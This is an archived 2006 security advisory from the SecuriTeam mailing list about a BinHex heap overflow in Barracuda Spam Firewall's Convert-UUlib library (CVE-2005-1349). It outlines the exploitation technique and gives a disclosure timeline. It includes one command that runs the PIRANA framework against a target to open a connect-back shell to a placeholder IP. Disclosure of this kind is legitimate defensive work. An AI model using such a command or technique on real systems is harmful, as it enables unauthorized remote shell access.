The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[UNIX] Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 6 Dec 2006 17:06:25 +0200
Subject: [UNIX] Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20061206144719.D45BF582F@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Barracuda Spam Firewall Convert-UUlib Library Buffer Overflow
------------------------------------------------------------------------


SUMMARY

The  <http://www.barracudanetworks.com/>; Barracuda Spam Firewall is an 
integrated hardware and software solution for complete protection of your 
email server. It provides a powerful, easy to use, and affordable solution 
to eliminating spam and virus from your organization.

A vulnerability in Barracuda Spam Firewall allows a malicious attacker to 
gain shell access to the remote Barracuda Spam Firewall.

DETAILS

Vulnerable Systems:
 * Barracuda Firewall with firmware releases before versions 3.3.15.026.

The flaw is in the part of the code where BinHex files were getting 
parsed. By supplying an invalid size for the resource fork or data fork in 
a BinHex's file header, it is possible to create a heap overflow.

By taking advantage of the sequentials calls to free(), it's possible to 
overwrite more than 4 bytes. In fact, we can write a jmpcode in memory 
that will jump to one of our registers containing the location of our 
shellcode. By using this technique, the exploit will be much more 
reliable. You will only need to supply a return location address to the 
exploit code.

You do NOT need to have remote administration access (on port 8000) for 
successfull exploitation.

For further informations about the details of the bugs, check the exploit 
code.

Proof of concept:
Using the PIRANA framework, available at  <http://www.guay-leroux.com>; 
http://www.guay-leroux.com , it is possible to test the Barracuda Spam 
Firewall against the Convert-UUlib vulnerability.

The version 0.3.1 of the PIRANA framework incorporates a new module to 
exploit the Convert-UUlib library bug. It contains three hardcoded offsets 
that should reliably exploit every Barracuda Spam Firewall with a firmware 
below 3.3.15.026 and virus definition below 2.0.325.

By calling PIRANA the way it is described below, you will get a TCP 
connect back shell on IP address 1.2.3.4 and port 1234:
perl pirana.pl -e 5 -h barracuda.vulnerable.com -a postmaster -s 0 \ -l 
1.2.3.4 -p 1234

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1349>; 
CVE-2005-1349

Disclosure Timeline:
 * 2005-04-26  - Bug is disclosed by Mark Martinec and Robert Lewis.
 * 2006-08-??  - Convert-UUlib module exploit written for PIRANA.
 * 2006-11-28  - Barracuda Networks is notified about the problem.
 * 2006-11-28  - Barracuda Networks acknowledged the problem.
 * 2006-11-29  - Barracuda Networks published a fix.
 * 2006-12-05  - Advisory is disclosed to the public.


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:jean-sebastien@guay-leroux.com.> Jean-S bastien Guay-Leroux.
The original article can be found at:
 
<http://www.guay-leroux.com/projects/barracuda-advisory-convert-uulib.txt>; 
http://www.guay-leroux.com/projects/barracuda-advisory-convert-uulib.txt




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру